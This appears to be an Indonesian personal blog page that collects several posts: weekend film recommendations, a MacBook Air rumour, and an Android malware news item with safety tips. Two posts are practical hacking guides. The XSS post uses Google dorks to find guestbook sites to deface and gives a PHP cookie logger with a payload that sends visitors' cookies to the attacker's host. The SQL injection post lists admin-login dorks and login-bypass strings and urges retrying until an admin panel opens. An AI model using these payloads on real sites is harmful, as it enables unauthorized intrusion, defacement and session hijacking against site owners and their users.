Mission Impossible: Ghost Protocol

Sepertinya hampir 2 minggu gue ga update info tentang film-film yang pas di tonton buat weekend. Lagi agak sibuk soalnya (hehehehehehe). Ini aja gue nyolong-nyolong buat update blog, dikarenakan gue lagi ga mood banget utak-atik program. Baiklah sodara-sodara daripada gue nanti jadinya malah curhat mari kita langsung ke topik aja. Buat minggu ini gue mau merekomendasikan film Mission Impossible: Ghost Protocol. Film ini bercerita tentang ethan hunt (tom cruise) beserta tim barunya (Jeremy Renner, Paula Patton dan Simon Pegg) dalam misi untuk membersihkan nama institusi mereka yaitu IMF (Imposible Mission Force) yang dituduh dalam plot pengeboman global yang dilakukan oleh teroris. Mereka harus menyamar dan selama penyamaran tidak ada telpon, tidak ada kontak dan pastinya mereka harus tidak dapat dilacak.

Film ini wajib ditonton bagi mereka yang sangat menyukai genre film action. Karena adegan-adegan di film ini full action. Salah satu action yang bikin gue takjub di film ini adalah ketika ethan hunt memanjat menara tertinggi di dunia yaitu Burj Khalifa. Dan dari berita-berita yang gue baca, dalam melakukan aksi ini tom cruise ngga pake jasa pemeran pengganti (wooooow). Yang lebih seru lagi film ini hadir dalam format IMAX. Yup, tunggu apa lagi mari ke XXI atau Blitz Megaplex terdekat buat nonton film ini. Happy Weekend \(^0^)/

XSS Injector

XSS Injections

XSS merupakan sebuah serangan yang termasuk dalam jenis injeksi kode. Penyerangan ini dilakukan dengan cara memasukkan kode-kode html ke dalam suatu situs. Akibat yang bisa ditimbulkan dari serangan ini antara lain penyerang dapat memotong keamanan dari sisi klien, mendapatkan informasi yang bersifat case sensitif, atau bisa saja menyisipkan aplikasi berbahaya ke dalam web yang diserang.

Ada dua tipe serangan XSS:

1. Reflected atau nonpersistent
   tipe serangan XSS ini merupakan tipe serangan yang paling umum dilakukan oleh penyerang. Cara kerjanya adalah penyerang menggunakan tautan pada media social engineering agar tautan yang sudah disisipi kode berbahaya ini diklik oleh pengguna. Jika tautan berbahaya ini diklik oleh pengguna maka penyerang akan mendapatkan cookie pengguna yang nantinya akan digunakan untuk membajak session pengguna. Pertahanan untuk menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data dan jangan mudah percaya pada apapun yang dikirim pengguna, terutama jika itu merupakan sebuah tautan.
2. Stored atau Persistent
   serangan jenis ini jarang ditemui tetapi memiliki dampak serangan yang besar. Sebuah serangan pada stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi pada saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali.

Contoh penggunaan XSS injector

1. masukkan kata kunci inurl:.com/guestbook ke dalam mesin pencari google, keyword tersebut digunakan untuk mencari alamat website .com/guestbook
2. setelah pencarian keluar, lalu pilih website mana yang akan kita jadikan sasaran XSS injector, setelah lakukan pengetesan dengan cara memasukkan kode dibawah ini ke dalam textfield yang ada dibagian guestbook.
   <script>alert(“/XSS”/)</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”)</script>;
<script>alert(String.fromCharCode(88,83,83))</script>
<body onload=alert(‘XSS’)>
<script type=text/javascript>alert(“XSS”)</script>
3. jika setelah di enter muncul pop up yang berisi tulisan XSS, itu artinya situs tersebut siap untuk kita serang.
4. Beberapa jenis serangan yang bisa kita lakukan adalah melakukan defacement dan mencuri cookies dari website tersebut.
5. Untuk melakukan defacement kita dapat memasang kode
   <meta http-equiv=”refresh” content=”0;url=http://www.tinypic.com/deface.png” />
   atau
   <script>window.open( “http://www.tinypic.com/deface.png” )</script>
6. sedangkan untuk melakukan pencurian cookies. Jika kita memasukkan script berikut ini <script>alert(document.cookie)</script> , kita dapat mencuri login information dari situs yang kita serang. Namun kita harus menggunakan cookie editor untuk bisa menggunakan cookie yang tercuri tersebut.
7. Alternatif lain adalah dengan membuat cookie logger sendiri. Buat sebuah file dengan nama cookielogger.php. Masukkan script dibawah ini:
   <?php
$cookie = $_GET['cookie'];
$log = fopen(“cookies.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>
8. setelah itu buat sebuah file kosong dengan nama cookies.txt. File kosong ini nantinya akan digunakan untuk menuliskan hasil cookie yang kita curi. Setelah itu upload kedua file ini kedalam media hosting yang mendukung php seperti ripway.com, 000webhost.com dan lain-lain.
9. Kemudian sisipkan kode berikut ke situs yang akan diserang
10. <script>alert(namalogin.namamediahostingkamu.com/cookielogger.php)</script>
11. atau
12. <script>document.location=’namalogin.namamediahostingkamu.com/cookielogger.php?
cookie=’+escape(document.cookie) </script>
13. setelah memasukkan kode tersebut maka cookie akan tertulis di file cookies.txt yang kita hosting ke dalam media hosting kita. Login kedalam media host kemudian buka file cookies.txt

SQL Injector

Sql injections

apa itu sql injections?

Sql injections adalah salah satu teknik hacking yang memanfaatkan celah keamanan yang terjadi pada lapisan basis data dalam sebuah aplikasi. Cara kerja sql injections adalah dengan memodifikasi perintah sql yang ada di memori aplikasi pengguna.

Penyebab terjadinya sql injections

sql injections terjadi dikarenakan tidak adanya filter terhadap karakter-karakter seperti tanda petik satu ' , karakter double minus –. hal inilah yang menyebabkan suatu aplikasi dapat disisipi oleh perintah-perintah sql yang dimanfaatkan untuk melakukan suatu penyerangan terhadap aplikasi.

Bahaya sql injections

salah satu bahaya yang bisa ditimbulkan dari penyerangan ini adalah seseorang bisa masuk ke dalam sistem tanpa harus memiliki account. Hal ini juga bisa memicu seseorang yang tidak memiliki izin masuk ke dalam sistem untuk merubah, menghapus dan menambahkan data-data yang ada di dalam database. Penyerangan ini juga memungkinkan seseorang untuk mematikan suatu database, sehingga web server tidak bisa mengakses data-data yang ada di dalam database tersebut.

Yang diperlukan untuk melakukan sql injections

1. browser
2. sambungan internet
3. software, contoh software yang digunakan adalah softice

contoh sintaks yang bisa digunakan untuk sql injections

$SQL = “select*from login where username = '$username' and password = '$password'”; (diperoleh dari get dan post variable)

sisipkan perintah OR'=' kedalam password, sehingga akan didapat kode

“select*from login where username = '$username' and password = 'pass' or '='”;

dengan begitu kita sudah bisa meng-inject sebuah sintaks sql hanya dengan menggunakan perintah OR.

Cara mencegah dan mengatasi sql injections

1. dengan melindungi query sql
teknik yang bisa diterapkan untuk melindungi query sql adalah dengan cara mengosongkan seluruh input yang diterima dari request object, seperti: Request, Request.Querystring,Request.Form,Request.Cookies dan Request.ServerVariables. Akan tetapi teknik ini sangat bergantung pada RDBMS. RDBMS memiliki sistem yang multiuser, sehingga RDMS menyertakan fitur keamanan untuk mengontrol akses ke/dan penggunaan database.
2. mengganti pesan error
cara kedua adalah dengan mengganti pesan error. Hal ini dikarenakan para penyerang bisa memanfaatkan pesan error ini untuk menelusuri jalur penyimpanan database.
3. batasi permisi
berikan hak izin hanya pada user yang terotorisasi saja. User harus yakin bahwa data yang ia terima sudah akurat dan tidak melakukan kecerobohan dalam memodifikasinya
4. sembunyikan atau matikan pesan error yang keluar dari SQL server yang sedang berjalan
5. jika memungkinkan, matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures
6. menggunakan MYSQL_escape_string

cara kerja teknik ini adalah dengan merubah string yang mengandung karakter ' menjadi \'. contohnya SQL infec'tion menjadi SQL infec\tion.

7. melakukan filter terhadap karakter ' dengan memodifikasi php.ini

modifikasi ini dimaksudkan untuk mengaktifkan variable magic_qoutes pada php.ini sehingga secara otomatis karakter ' diubah menjadi karakter \ .

contoh implementasi sql injections

1. masukkan salah satu dari keyword dibawah ini kedalam mesin pencari google
   “/admin.asp”
   “/login.asp”
   “/logon.asp”
   “/adminlogin.asp”
   “/adminlogon.asp”
   “/admin_login.asp”
   “/admin_logon.asp”
   “/admin/login.asp”
   “/admin/logon.asp”
   (anda bisa menambahkan sendiri keyword sesuai keinginan anda)
2. kemudian buka salah satu link yang berhasil ditemukan oleh google, kemungkinan hasil pencarian yang ditampilkan adalah sebuah halaman login.
3. Setelah itu masukkan kode berikut :
   Username : 'or 'a'='a
   Password : 'or 'a'='a
4. jika anda berhasil, maka kemungkinan anda akan masuk ke dalam halaman admin panel. Di halaman admin panel ini anda bisa menambahkan berita,mengedit user lain dan lain-lain.
5. Jika cara diatas belum berhasil, coba untuk membuka link lain yang ditampilkan di mesin pencari google.
6. Banyaknya variasi kode memungkinkan kita untuk bisa mengeksplor kode program, seperti:
   Username : admin
   Password : 'or 'a '=' a
   atau kita juga bisa mengkombinasikan kedua kode tersebut, sehingga bentuk kodenya menjadi:
   'or 0=0 -- ; “or 0=0 -- ; 'or 0=0 #;
7. jika masih belum berhasil, coba terus terus sampai anda berhasil masuk ke dalam admin panel

Macbook Air 15 inchi

Apple dikabarkan siap meluncurkan sejumlah seri notebook Macbook Air terbaru. Setidaknya apple mempersiapkan tiga seri Macbook Air yang berdasarkan pada ukuran layar yakni 11,6 inch, 13,3 inch dan 15 inch. Adapun model Macbook Air 15 inch diharapkan menjadi model yang mampu mendiferesiasi apple dalam menghadapi maraknya produk ultrabook dari produsen pesaing apple. 

Seperti dikutip dari Digitimes, sumber mengatakan Macbook Air terbaru ini siap dipasarkan pada kuartal pertama tahun 2012. Apple dikabarkan sengaja mempersiapkannya untuk menyaingi ultrabook dari produsen lain. Ultrabook selama ini merujuk pada produk-produk notebook yang ultra portable dengan design yang sangat tipis. Kemunculan ultrabook kerap dianggap terpengaruh oleh design Macbook Air. 

Apple sendiri terkahir kali meluncurkan produk Macbook Air pada juli kemarin. Perubahan terbesar yang terjadi pada Macbook Air terbaru ini terdapat pada processor dan Port Thunderbolt, yang menggantikan MiniDisplayPort pada versi sebelumnya. Port Thunderbolt merupakan koneksi harware berbasis Intel Light Peak dengan kecepatan maksimum 10 Gb/s. Sedangkan processor yang digunakan pada Macbook Air versi baru ini adalah processor standar core i5 (1,6 GHz dan 1,7 GHz dalam model layar 11 dan 13 inch), yang bisa di upgrade sampai 1,8 GHz core i7. Sedangkan untuk versi lamanya hanya menggunakan processor 1,4 GHz dan 1,8 GHz Intel Core 2 Duo.

Sumber Digitimes dari retail menyebut, Apple akan menjatuhkan harga Macbook Air yang telah ada, sebelum meluncurkan Macbook Air versi terbaru ini. Dengan cara ini, apple diperkirakan dapat meningkatkan perannya di pasar penjualan notebook.

sumber: vivanews

Arisan!2

Hore udah hari jumat. Itu tandanya besok adalah weekend. Untuk weekend besok gue mau merekomendasikan film arisan!2. Mungkin film ini adalah salah satu film yang ditunggu para penggemar film di Indoesia selama 8 tahun ini. Akhirnya sekuel film arisan ini rilis juga pada tanggal 1 desember kemaren. Film ini masih banyak dibintangi oleh para aktor dan aktris yang 8 tahun silam turun berperan dalam film arisan. Seperti Cut mini, Rachel maryam, Tora sudiro, Surya saputra dan Aida nurmala. Tidak ketinggal untuk film arisan!2 ini sang sutradara sekaligus penulis dan produser film ini yaitu Nia dinata juga menghadirkan sederet aktor dan aktris kawakan Indonesia untuk turut meramaikan sekuel film arisan ini. Nama-nama baru yang muncul dalam film arisan!2 ini adalah Sarah sechan, Atiqah hasiholan, Rio dewanto, Pong harjatmo, Aming dan Titi dj. Beserta sederet nama aktor dan aktris lainnya.

Film arisan!2 ini masih bercerita tentang kelanjutan kisah hidup Sakti(Tora sudiro), Mei mei(Cut mini) dan Andien(Aida nurmal). Serta kehidupan sepupu Sakti, Lita(Rachel maryam), yang dulu sempat dijodohkan dengan sakti dan kini lita sudah hidup menetap di jakarta. Tidak ketinggal Nino(Surya saputra) kekasih sakti yang kini sudah menjadi bagian dari kehidupan para shabat-sahabat ini.

Disini juga terjadi perubahan yang tidak bisa dihindarkan oleh para tokoh utama dalam film ini, seperti menginggalnya suami andien, perceraian meimei, penolakan lita terhadap institusi perkawinan, walaupun dirinya memilih untuk membesarkan anak yang dikandungnya. Tidak ketinggalan terhambatnya hubungan sesama jenis antara sakti dan nino yang akhirnya membuat mereka memutuskan untuk berpisah dulu.

Kemunculan dokter Joy(Sarah sechan) yang seorang ahli bedah plastik dengan seorang finaciernya ara(Atiqah hasiholan) menjadi obat bagi ibu-ibu arisan jakarta ini. Bahkan penulis yang dahulu suka mengkritisi para ibu-ibu arisan ini, Yayuk asmara(Ria irawan), sekarang justru berubah haluan dan mengeruk keuntungan dengan menulis biografi mereka. Serta kehadiran Octa(Rio dewanto) seorang pria tampan juga turut meramaikan 'social scene' jakarta.

Sampai pada akhirnya sakti, andien, lita dan nino dihadapkan pada kenyataan yang mengejutkan bahwa meimei selama ini menyembunyikan penyakit kanker yang di deritanya dan ia tidak sekedar berlibur ke pulau. Akhirnya mereka berkumpul dan menyusun strategi untuk mendatangi meimei dan membongkar rahasia meimei. Namun, pada akhirnya banyak juga rahasia-rahasia lain yang juga turut terbongkar dan mereka harus menentukan pilihan.

Hayo buat para penggemar film di Indonesia, rasanya sayang untuk melewatkan film yang satu ini. Buat yang sudah masuk kategori dewasa film ini bisa juga dijadikan referensi untuk nonton bareng bersama sahabat, rekan kantor atau mungkin bersama pasangan di akhir pekan ini. Tunggu apa lagi...

HAPPY WEEKEND \(^0^)/

Malware ancam android

Perilisan mc afee terbaru menyatakan bahwa sepanjang kuartal ketiga tahun 2011 sistem operasi android menjadi target utama serangan malware pada perangkat selular. Menurut mc afee, seperti dilansir dari techcrunch.com bahwa hampir semua malware baru dalam kuartal ketiga ini menyasar android. Berdasarkan laporan malware yang menjadikan perangkat android sebagai sasaran melonjak sampai 37 persen. Hal ini mentasbihkan bahwa tahun ini adalah tahun tersibuk dalam sejarah malware.

Dua diantara malware yang menyerang perangkat android adalah DroidDream Light dan Zitmo. Sebelumnya DroidDream Light ini telah menyerang 120.000 pengguna android. Menurut Lookout, sebuah perusahaan pembuat antivirus yang menemukan kedua malware tersebut, DroidDream Light ditemukan menempel pada aplikasi resmi yang terdapat di android market, seperti: Quick Falldown, Sientific Calcullator, Buble Buster dan  sebuah klon dari Best Compass dan Leveler. Diperkirakan bahwa malware ini telah menginfeksi lebih dari 50 aplikasi di android market. 

Cara kerja malware ini adalah dengan menginstal aplikasi tambahan secara otomatis je dalam ponsel Android. Begitu terinfeksi, ponsel akan merestart sendiri begitu ada panggilan masuk. Saat itulah, malware akan menginstal aplikasi tambahan berupa trilojan. Trojan inilah yang akan menyadap ponsel kamu. Ia akan mencuri data pribadi kamu, seperti email, password, user account, nomor kartu kredit.

Sedangkan untuk varian malware yang lain yaitu Zitmo. Malware ini bertugas mencuri informasi bank dari pengguna ponsel android. Begitu pengguna mengakses website bank miliknya, malware ini segera bekerja dengan merekam pesan atau sms yang memberikan kode atau password bank kemudian melakukan transaksi dengan menggunakan akun tersebut.

Cara malware menginfeksi perangkat android adalah pada saat kita mengunduh sebuah aplikasi. Karena pada saat tersebut sistem akan terbuka dan smartphone yanng tidak dilengkapi dengan sistem keamanan menjadi salah satu penyebab malware ini mudah menyebar.

Lalu bagaimana cara pengguna android mengamankan perangkat android miliknya dari ancaman malware? Berikut adalah tips mengamankan perangkat android seperti dikutip dari situs tabloidpcplus.com.

1. Selalu mengunci perangkat anda, dan gunakan password untuk melakukan akses ke perangkat komunikasi kamu.

2. Jika kamu akan memasukan data pribadi, lakukan hanya untuk aplikasi-aplikasi yang disediakan oleh pembuatnya. Itu berarti, jika kamu men-download Facebook app haruslah dari website Facebook, demikian juga dengan twitter app dari Twitter, Yahoo messenger app dari Yahoo.

3. Jangan menyimpan informasi bersifat rahasia didalam perangkat smartphone kamu.

4. Aktifkan Password programs.

5. Matikan fungsi layanan geo-location.

6. Aktifkan sistem proteksi password.

7. Hapus atau pindahkan foto-foto pribadi yang tidak ingin kamu sebarkan.

8. Jangan menginstall aplikasi-aplikasi dari pengembang yang tidak dikenal. Jika kamu sudah terlanjur melakukan download yang dimaksud, hentikan dulu aktifitas online banking dari perangkat mobile anda, karena applikasi tersebut berpotensi malware.

9. Cermati dulu aplikasi-aplikasi yang ingin kamu download dan install

• Apakah aplikasi tersebut telah didownload ratusan ribu kali?

• Apakah memiliki rating yang tinggi?

• Apakah aplikasi-aplikasi tersebut sudah ada sejak lama?

• Apakah pengembang aplikasi tersebut dipercaya oleh kalangan industri dan

customernya? Untuk mengetahuinya dapat dilakukan dengan memeriksa melalui search engine, melalui jejaring sosial, maupun dari micro blog.

10. Jika kamu mengklik sebuah link di e-mail, jangan pernah memasukkan data-data pribadi ke dalamnya. Karena banyak kasus masuknya malware melalui modus tersebut, terlebih jika dilakukan melalui perangkat komunikasi mobile, resikonya akan semakin tinggi. Akan lebih aman jika melakukannya dengan memasukkan nama website pada web browser, baru kemudian masukan data.

11. Install aplikasi keamanan dan aktifkan program Anti Virus.

12. Perlakukan perangkat smartphone kamu layaknya desktop karena pelaku kejahatan dunia maya tidak perduli platfom apa yang kamu gunakan, tetapi justru menyasar setiap orang untuk dijadikan korban.